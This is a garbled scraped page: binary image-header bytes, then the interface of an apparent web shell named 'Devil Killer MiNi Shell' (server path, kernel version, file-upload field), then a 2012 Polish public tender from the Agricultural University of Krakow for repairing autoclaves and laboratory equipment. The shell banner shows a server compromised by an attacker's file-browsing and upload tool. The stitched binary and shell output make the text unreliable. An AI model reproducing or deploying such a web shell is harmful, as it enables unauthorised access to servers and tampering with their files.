JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120725/161925-N-2012.html

<p class="kh_header"><b>Kraków: Świadczenie usług naprawy i konserwacji sprzętu laboratoryjnego oraz autoklawów dla potrzeb jednostek Uniwersytetu Rolniczego w Krakowie</b><br>
<b>Numer ogłoszenia: 161925 - 2012; data zamieszczenia: 25.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Rolniczy im. Hugona Kołłątaja w Krakowie , al. Mickiewicza 21, 31-120 Kraków, woj. małopolskie, tel. 012 6624413, faks 012 6624410.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ur.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług naprawy i konserwacji sprzętu laboratoryjnego oraz autoklawów dla potrzeb jednostek Uniwersytetu Rolniczego w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług naprawy i konserwacji sprzętu laboratoryjnego oraz autoklawów dla potrzeb jednostek Uniwersytetu Rolniczego w Krakowie - zgodnie z bieżącymi potrzebami zamawiającego. 
2.	Zamawiający dopuszcza możliwość składania ofert częściowych zgodnie z podanym niżej podziałem na dwie części:
Zadanie nr 1.	Autoklawy (sterylizatory);
Zadanie nr 2.	Sprzęt laboratoryjny (łaźnie, wytrząsarki, suszarki, cieplarki, mieszadła, destylarki, młynki i inne z wyłączeniem wag laboratoryjnych, mikroskopów szkolnych i lup). 
3.	Miejsce świadczenia usług: jednostki zamawiającego położone w obiektach przy: al. Mickiewicza 21, al. Mickiewicza 24/28, ul. Czystej 21, al. 29 Listopada 46, al. 29 Listopada 52, al. 29 Listopada 54, al. 29 Listopada 48b, al. 29 Listopada 48c, ul. Urzędniczej 68, ul. Jabłonkowskich 10-12, ul. Klemesiewicza 3, ul. Balickiej 104, ul. Balickiej 253, ul. Balickiej 253a, ul. Balickiej 122, ul. Podłużnej 3, ul. Łobzowskiej 24, ul. Św. Marka 37, ul. Łupaszki 6. ul. T. Spiczakowa 6.
4.	Świadczenie usług odbywać się będzie w jednostkach zamawiającego, tylko w wyjątkowych sytuacjach w punkcie serwisowym - gdy naprawa na miejscu okaże się niemożliwa.
5.	Prace naprawczo-konserwacyjne dotyczą urządzeń będących po upływie okresu gwarancji.
6.	Zakres prac naprawczo-konserwacyjnych obejmuje:
a)	konserwację  i  czyszczenie  urządzeń,  zgodnie  z  zaleceniami  ich producentów dotyczącymi eksploatacji tych urządzeń,
b)	diagnostykę awarii,
c)	prace naprawczo-konserwacyjne, mające na celu zabezpieczenie bezawaryjnej pracy we wszystkich jednostkach zamawiającego,
d)	przeglądy serwisowe
e)	doradztwo i konsultacje w zakresie korzystania z urządzeń,
f)	dla autoklawów dodatkowo:
f.1)	współpraca z Urzędem Dozoru Technicznego polegająca na dostosowaniu się do terminu wyznaczonego przez Urząd do przeprowadzenia rewizji wewnętrznej ( Dz.U. nr 122/2000 poz1321 z późn. zm.).
f.2)	naprawa, konserwacja i sprawdzenie:
-	działania układów mających wpływ na bezpieczeństwo: działania zaworu bezpieczeństwa, ciśnienia początku otwarcia, nastawy wyłączników ciśnieniowych sterujących wytwornicą pary, ewentualne wyregulowanie, połączeń elektrycznych, szczególnie przewodów ochronnych, podokręcać.
-	stanu technicznego uszczelek (stopień zużycia), ewentualnie wymiana,
-	szczelności, czyszczenie odwadniacza i zaworów; instalacji parowej, instalacji wodnej, instalacji odpływowej.
-	układu sterowania poziomem wody w wytwornicy pary (minimalny i maksymalny poziom), ewentualne wyregulowanie,
-	działania pompy próżniowej (poziom próżni),
-	przyrządów kontrolno- pomiarowych; manowakuometry, termometr.
-	elementów sygnalizacji stanów awaryjnych.
-	działania sterylizatora.
f.3)	czyszczenie komory i osłon zewnętrznych sterylizatora.
7.	Wykaz autoklawów podlegających naprawie i konserwacji stanowi załącznik do specyfikacji.
8.	Świadczenie usług odbywać się będzie na podstawie pisemnych zleceń, zgłoszenia telefonicznego lub e-mailem.
9.	Wykonawca zobowiązany będzie do bezpłatnego telefonicznego udzielania porad w zakresie objętym zamówieniem.
10.	Wykonawca będzie utrzymywał gotowość do świadczenia usług w jednostkach zamawiającego w godzinach od 7:30 do 15.30 od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy.
11.	Termin wykonania usługi: do 7 dni roboczych od daty zgłoszenia/przekazania zlecenia.
12.	Czas reakcji (przybycia) pracowników wykonawcy na zgłoszoną potrzebę wykonania usługi wynosi: do 3 godzin licząc od chwili zgłoszenia/przekazania zlecenia.
13.	Przed przystąpieniem do wykonania usługi pracownik wykonawcy oszacuje wartość usługi (na podstawie ceny 1 roboczogodziny oraz cen części zamiennych koniecznych do wykonania naprawy) i przedstawi ją zamawiającemu. Części zamienne muszą być oryginalne i techniczne nowe.
14.	Ceny części  zamiennych wykonawca skalkuluje zgodnie ze swoim cennikiem obowiązującym na dzień sporządzenia kalkulacji. W przypadku, gdy ceny części zamiennych będą wyższe od cen rynkowych, zamawiający może dokonać zakupu niezbędnych części we własnym zakresie. 
15.	Pracownik wykonawcy przystąpi do świadczenia usług wyłącznie po pisemnym zaakceptowaniu oszacowanej wartości usługi przez jednostkę zamawiającego.
16.	Wykonawca zobowiązany będzie do wykonania usługi z należytą starannością w sposób zgodny z aktualną wiedzą techniczną.
17.	Wykonawca udzieli gwarancji na dokonaną naprawę urządzeń na okres min. 6 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 21.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku szczegółowego. 
Ocena spełniania warunku ogólnego dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/ w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek szczegółowy: wykonanie co najmniej dwóch usług odpowiadających swoim rodzajem usługom stanowiącym przedmiot niniejszego zamówienia, każdej o wartości nie mniejszej niż 20.000,00 złotych brutto, wykonanych lub wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. W przypadku usług aktualnie wykonywanych wartość usługi wykonanej do dnia składania ofert nie może być mniejsza niż 20.000,00 złotych brutto.
Ocena spełniania warunku dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/ w oparciu o:  
a) oświadczenie o spełnianiu warunków udziału w postępowaniu;
b) wykaz usług; 
c) dokumenty potwierdzające, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku szczegółowego. 
Ocena spełniania warunku ogólnego dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/ w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek szczegółowy: dysponowanie co najmniej dwoma osobami (serwisantami) posiadającymi doświadczenie w wykonaniu usług stanowiących przedmiot zamówienia.
Ocena spełniania warunku dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/ w oparciu o:  
a) oświadczenie o spełnianiu warunków udziału w postępowaniu;
b) wykaz osób;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku szczegółowego. 
Ocena spełniania warunku ogólnego dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/ w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony druk OFERTA - stanowiący załącznik nr 1 do specyfikacji. 
2.	Oryginał lub kopię pełnomocnictwa:
a)	dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych (np. z odpisu z właściwego rejestru). 
b)	dla ustanowionego pełnomocnika, do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy - dotyczy wykonawców wspólnie ubiegających się o udzielenie zamówienia. Zgodnie z art. 23 ust. 2 ustawy wykonawcy ubiegający się wspólnie o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy.
Wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. W przypadku złożenia kopii pełnomocnictwa, musi być ona potwierdzona za zgodność z oryginałem notarialnie.
3.	W przypadku, gdy wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków - zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Pisemne zobowiązanie należy złożyć w oryginale.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w zakresie:
a)	zmiany adresu pod którym urządzenie ma być naprawiane lub dostarczone z serwisu po naprawie, pod warunkiem, że zmiana obejmować będzie granice administracyjne miasta Krakowa oraz pod warunkiem, że cena nie ulegnie zmianie.
b)	zmiany miejsca lokalizacji serwisu gwarancyjnego pod warunkiem, że lokalizacja będzie bliżej siedziby Zamawiającego.
c)	zmiany osób przewidzianych do świadczenia usług, wskazanych w § 4 ust. 5 umowy, w przypadku nieprzewidzianych zdarzeń losowych między innymi takich jak: śmierć, choroba, ustanie stosunku pracy, pod warunkiem, że osoby zaproponowane przez Wykonawcę będą posiadały doświadczenie w świadczeniu usług stanowiących przedmiot umowy nie mniejsze niż osoby wskazane w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzp.ar.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Rolniczy im. Hugona Kołłątaja w Krakowie, Dział Zamówień Publicznych, al. Mickiewicza 21, 31-120 Kraków..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2012 godzina 12:00, miejsce: Uniwersytet Rolniczy im. Hugona Kołłątaja w Krakowie, Dział Zamówień Publicznych - pok. 37, al. Mickiewicza 21, 31-120 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Autoklawy (sterylizatory);.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Naprawa i konserwacja autoklawów dla potrzeb jednostek Uniwersytetu Rolniczego w Krakowie - zgodnie z bieżącymi potrzebami zamawiającego.  
2. Miejsce świadczenia usług: jednostki zamawiającego położone w obiektach przy: al. Mickiewicza 21, al. Mickiewicza 24/28, ul. Czystej 21, al. 29 Listopada 46, al. 29 Listopada 52, al. 29 Listopada 54, al. 29 Listopada 48b, al. 29 Listopada 48c, ul. Urzędniczej 68, ul. Jabłonkowskich 10-12, ul. Klemesiewicza 3, ul. Balickiej 104, ul. Balickiej 253, ul. Balickiej 253a, ul. Balickiej 122, ul. Podłużnej 3, ul. Łobzowskiej 24, ul. Św. Marka 37, ul. Łupaszki 6. ul. T. Spiczakowa 6.
3.	Świadczenie usług odbywać się będzie w jednostkach zamawiającego, tylko w wyjątkowych sytuacjach w punkcie serwisowym - gdy naprawa na miejscu okaże się niemożliwa.
4.	Prace naprawczo-konserwacyjne dotyczą urządzeń będących po upływie okresu gwarancji.
5.	Zakres prac naprawczo-konserwacyjnych obejmuje:
a.	konserwację  i  czyszczenie  urządzeń,  zgodnie  z  zaleceniami  ich producentów dotyczącymi eksploatacji tych urządzeń,
b)	diagnostykę awarii,
c)	prace naprawczo-konserwacyjne, mające na celu zabezpieczenie bezawaryjnej pracy we wszystkich jednostkach zamawiającego,
d)	przeglądy serwisowe,
e)	doradztwo i konsultacje w zakresie korzystania z urządzeń,
f) współpracę z Urzędem Dozoru Technicznego polegająca na dostosowaniu się do terminu wyznaczonego przez Urząd do przeprowadzenia rewizji wewnętrznej.
g)	naprawa, konserwacja i sprawdzenie:
-	działania układów mających wpływ na bezpieczeństwo: działania zaworu bezpieczeństwa, ciśnienia początku otwarcia, nastawy wyłączników ciśnieniowych sterujących wytwornicą pary, ewentualne wyregulowanie, połączeń elektrycznych, szczególnie przewodów ochronnych, podokręcanie.
-	stanu technicznego uszczelek (stopień zużycia), ewentualnie wymiana,
-	szczelności, czyszczenie odwadniacza i zaworów; instalacji parowej, instalacji wodnej, instalacji odpływowej.
-	układu sterowania poziomem wody w wytwornicy pary (minimalny i maksymalny poziom), ewentualne wyregulowanie,
-	działania pompy próżniowej (poziom próżni),
-	przyrządów kontrolno- pomiarowych; manowakuometry, termometr.
-	elementów sygnalizacji stanów awaryjnych.
-	działania sterylizatora.
h)	czyszczenie komory i osłon zewnętrznych sterylizatora.
6. Wykaz autoklawów podlegających naprawie i konserwacji stanowi załącznik do specyfikacji.
7. Świadczenie usług odbywać się będzie na podstawie pisemnych zleceń, zgłoszenia telefonicznego lub e-mailem.
8. Wykonawca zobowiązany będzie do bezpłatnego telefonicznego udzielania porad w zakresie objętym zamówieniem.
9. Wykonawca będzie utrzymywał gotowość do świadczenia usług w jednostkach zamawiającego w godzinach od 7:30 do 15.30 od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy.
10. Termin wykonania usługi: do 7 dni roboczych od daty zgłoszenia/przekazania zlecenia.
11. Czas reakcji (przybycia) pracowników wykonawcy na zgłoszoną potrzebę wykonania usługi wynosi: do 3 godzin licząc od chwili zgłoszenia/przekazania zlecenia.
12. Przed przystąpieniem do wykonania usługi pracownik wykonawcy oszacuje wartość usługi (na podstawie ceny 1 roboczogodziny oraz cen części zamiennych koniecznych do wykonania naprawy) i przedstawi ją zamawiającemu. Części zamienne muszą być oryginalne i techniczne nowe.
13. Ceny części  zamiennych wykonawca skalkuluje zgodnie ze swoim cennikiem obowiązującym na dzień sporządzenia kalkulacji. W przypadku, gdy ceny części zamiennych będą wyższe od cen rynkowych, zamawiający może dokonać zakupu niezbędnych części we własnym zakresie. 
14. Pracownik wykonawcy przystąpi do świadczenia usług wyłącznie po pisemnym zaakceptowaniu oszacowanej wartości usługi przez jednostkę zamawiającego.
15. Wykonawca zobowiązany będzie do wykonania usługi z należytą starannością w sposób zgodny z aktualną wiedzą techniczną.
16. Wykonawca udzieli gwarancji na dokonaną naprawę urządzeń na okres min. 6 miesięcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 21.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzęt laboratoryjny (łaźnie, wytrząsarki, suszarki, cieplarki, mieszadła, destylarki, młynki i inne z wyłączeniem wag laboratoryjnych, mikroskopów szkolnych i lup)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług naprawy i konserwacji sprzętu laboratoryjnego dla potrzeb jednostek Uniwersytetu Rolniczego w Krakowie - zgodnie z bieżącymi potrzebami zamawiającego. 
2. Miejsce świadczenia usług: jednostki zamawiającego położone w obiektach przy: al. Mickiewicza 21, al. Mickiewicza 24/28, ul. Czystej 21, al. 29 Listopada 46, al. 29 Listopada 52, al. 29 Listopada 54, al. 29 Listopada 48b, al. 29 Listopada 48c, ul. Urzędniczej 68, ul. Jabłonkowskich 10-12, ul. Klemesiewicza 3, ul. Balickiej 104, ul. Balickiej 253, ul. Balickiej 253a, ul. Balickiej 122, ul. Podłużnej 3, ul. Łobzowskiej 24, ul. Św. Marka 37, ul. Łupaszki 6. ul. T. Spiczakowa 6.
3. Świadczenie usług odbywać się będzie w jednostkach zamawiającego, tylko w wyjątkowych sytuacjach w punkcie serwisowym - gdy naprawa na miejscu okaże się niemożliwa.
4. Prace naprawczo-konserwacyjne dotyczą urządzeń będących po upływie okresu gwarancji.
5. Zakres prac naprawczo-konserwacyjnych obejmuje:
a)	konserwację  i  czyszczenie  urządzeń,  zgodnie  z  zaleceniami  ich producentów dotyczącymi eksploatacji tych urządzeń,
b)	diagnostykę awarii,
c)	prace naprawczo-konserwacyjne, mające na celu zabezpieczenie bezawaryjnej pracy we wszystkich jednostkach zamawiającego,
d)	przeglądy serwisowe
e)	doradztwo i konsultacje w zakresie korzystania z urządzeń,
